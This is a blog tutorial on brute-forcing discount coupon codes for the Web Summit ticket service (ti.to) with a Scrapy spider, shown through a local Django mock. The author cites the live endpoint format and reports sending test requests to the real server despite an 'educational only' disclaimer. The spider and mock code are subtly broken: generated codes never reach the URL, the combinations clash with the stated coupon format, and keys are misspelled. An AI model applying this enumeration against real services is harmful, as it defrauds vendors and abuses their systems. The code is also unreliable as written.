Brute Forcing Forms with Scrapy

Table of Contents

I recently had the opportunity for me and my team to attend WebSummit as a startup. And if you don’t already know Web Summit gives you a great opportunity with the Alpha package to get 3 people of your team for a very low price. And then as a team of 8 I decided to send them and request one more of this package, leading to a discount per ticket only for Alpha exhibitors for a short of time. Annnnd I missed the deadline. Then I tried to find every possible way to find a discount and get my whole team to the biggest tech event in the world. As I could see from the WebSummit ticket service the coupon check worked like this. You typed your code and hitting submit and Ajax request was generated and then an Ajax response was coming. That is nice. And no security like csrf tokens in my way. The request was like this

https://ti.to/websummit/2017-web-summit/iframe?discount_code=LTSW12343l&release_ids=398oawcyg90&398oawcyg90=1&source=,

so it is easy for me to make different “ajax” requests with unique codes and get my response back. As a response I was getting a json object with html code inside the view tag. The keyword for detecting if the coupon was right was the absense of the keyword “unavailable” . So now let’s break it down and start bruteforcing.

Get your hands dirty

Start with creating a virtual environment and installing Scrapy and Django with pip .

mkvirtualenv -p python3 ScrapyBruteForce
cd Desktop/
mkdir ScrapyBruteForce
pip install scrapy
pip install django
cd ScrapyBruteForce

I installed django as this post is only for educational reasons. And we should never ever try to hack anything.

Django Server Creation

Now you will ask me why django. To simulate the ajax calls we show earlier at Web Summit ticket service. If you are familiar with django skip this part of feel free to clone my GitHub repo. And start playing now. Or go directly to the scrapy part. For anyone familiar with Ajax and Django this is going to be just a few lines of code. Just creating a simple form with input the coupon and when the submit button is pressed an ajax call will be triggered. If the response is positive we will not have the keyword “unavailable” in our tag. Now to begin we have to initialise a django project .

django-admin startproject WebSummitTicketing
cd WebSummitTicketing/
django-admin startapp Bruteforce

And now your django project should be like this.

.
├── Bruteforce
│     ├── __init__.py
│     ├── admin.py
│     ├── apps.py
│     ├── migrations
│     │&nbsp;&nbsp; └── __init__.py
│     ├── models.py
│     ├── tests.py
│     └── views.py
├── WebSummitTicketing
│     ├── __init__.py
│     ├── settings.py
│     ├── urls.py
│     └── wsgi.py
└── manage.py

Django is a MVC framework so we have to define a url for our index.html first and then a url for the ajax calls.

So open urls.py with yout favourite text editor and fill urlpatterns with the following and then open views.py to handle the view process.

urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^$', views.home, name='home'),
    url(r'^ajax/coupon/', views.ajax, name='ajax'),
]

from django.shortcuts import render,redirect

def home(request):
    return render(request,'index.html')

Now in order for django to find that index.html file we have to import first, our Bruteforce app in the settings.py. It should look now like this

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'Bruteforce'
]

And we have to create a folder inside Bruteforce dir with the name templates.This is were django will look for our html files. Now create inside that folder the index.html file. Inside that html place this code .

<!Doctype html>
<html lang="en">
    <head>
    </head>
    <body>
        <form>
            {% csrf_token %}
            <input id="coupon" type="text" name="coupon" method="POST">
            <button id="submit">
        </form>
        <script
        src="https://code.jquery.com/jquery-1.12.4.min.js"
        integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ="
        crossorigin="anonymous"></script>
        
        <script>
        $("#submit").click(function() {
            
            var form = $(this).closest("form");
        
            $.ajax({
                type: "POST",
                url: '/ajax/coupon/',
                data: form.serialize(),
                dataType: 'json',
                success: function (data) {
                console.log(data.success)
        }});
        
        
        });
        </script>
    </body>
</html>

Remember without CSRF token django will not let you make an Ajax request. And I don’t blame it. Web safety is one of the #1 priorities nowadays . Now as we saw earlier we got the response as html code inside json key “view”. But now we are going to get the response in json format with the key success for the sake of simplicity. Before we start penetrating one more step. We have to write the view function to handle the ajax requests.

def ajax(request):

    code=request.GET.get('code',None)

    if code=="LWFD12334m":
        data = {
            'sucess': 'available'
        }
    else:
        data={
        'success':'unavailable'
        }
    
    return JsonResponse(data)

As we can see from the code we are getting a request to our server in this format http://localhost:8000/ajax/coupon/?code=\*\*\*\*\*\*\*\*. So we extract the code value and check if it is the right code. If it is the right one it should return a json object with the key success with the value available if the code is the right one or the key success with the value unavailable if the code isn’t the right one. Now run the server and in another terminal make a request to see the response.

python manage.py runserver

#### In another terminal #####

curl http://localhost:8000/ajax/coupon/?code=LWFD1234m

curl http://localhost:8000/ajax/coupon/?code=WFAS2412w

With the first request you should get a response {"sucess": "available"} while with the second request you should get {"sucess": "unavailable"} as a response. So we are now ready to start writing our penetration script and get that coupon code we always wanted.

I am also curious to find out if my assumption was right and Scrapy was one of the finest solutions to my problem. To check it I will right a simple python script to make the requests as I want and the I will implement it with a Scrapy spider and compare the results.

Scrapy pen tool

Now stop the server if it is still running and go to the root of the project and initialize your scrapy project . Then go inside the spider folder and create a file named PenTool.py .

scrapy startproject PenTool
cd PenTool/PenTool/spiders/ && touch PenTool.py

And your projects tree should look like it

.
├── PenTool
│ ├── __init__.py
│ ├── __pycache__
│ ├── items.py
│ ├── middlewares.py
│ ├── pipelines.py
│ ├── settings.py
│ └── spiders
│     ├── PenTool.py
│     ├── __init__.py
│     └── __pycache__
└── scrapy.cfg

Open your PenTool.py and start writing our little brute-forcing spider.

import string 
import scrapy
from itertools import combinations
from scrapy.exceptions import CloseSpider

class Myspider(scrapy.Spider):
    
    name = "WebSummit"

    def start_requests(self):


            for x in combinations(string.ascii_uppercase,3) :

                up=(''.join(x))

                for y in combinations(string.digits,5) :

                    dig=(''.join(y))


                    for z in string.ascii_lowercase :


                        low=(''.join(z))


                        url= "http://127.0.0.1:8000/ajax/coupon/?code=LWFD1234m"

                        
                        yield scrapy.Request(url=url, callback=self.parse)

                    
        
    def parse(self, response):


        if "unavailable" in response.text :

            return

        else :

            raise CloseSpider('Code Found : {}' .format(response.url))

As we saw in the beginning of the Article the coupon had a format of 4 upper case letters 5 digits in a row and then a lower case letter. That means 26^4x10^5x26 = 1.1881376e+12 . Those are a lot of combinations. Now we can estimate the worst case scenario. Modifying a little bit the code to run a “speed” test I saw that Scrapy requests on local host handled1000 requests in : 6.962241301999711 seconds. Not bad. Not bad at all. That means 142.85 requests per second or 0.0069622413 seconds per request . For our case that would mean 82721006711.788118282336 seconds or 265.95 years to complete. With python request library that time fell to 4.8seconds. And I am starting to thinking that scrapy lost the battle with the localhost server. But that’s it? I tempted and tested it in real environment just for 1000 requests. With the request library the results were absolutely horrible. Like a lot of minutes to complete not even worth of waiting. Then I tested with Scrapy and the results were 15.752997165000124 seconds for 1000 requests. That’s what I wanted to see, Scrapy win this battle with ease. The results are that bad with urllib also. If you wanna get your hands dirtier giving a try atasyncio library could save you more time. As Paweł Miech wrote in his article with asyncio Python can achieve around 111 111 in one minute comparing with Scrapy that achieved around 4000 requests per minute in WebSummit’s server. Using Scrapy as a web crawler only is like turn around in the pretty nice features it has about handling requests concurrent without us getting dirty. And Bruteforcing is one of them.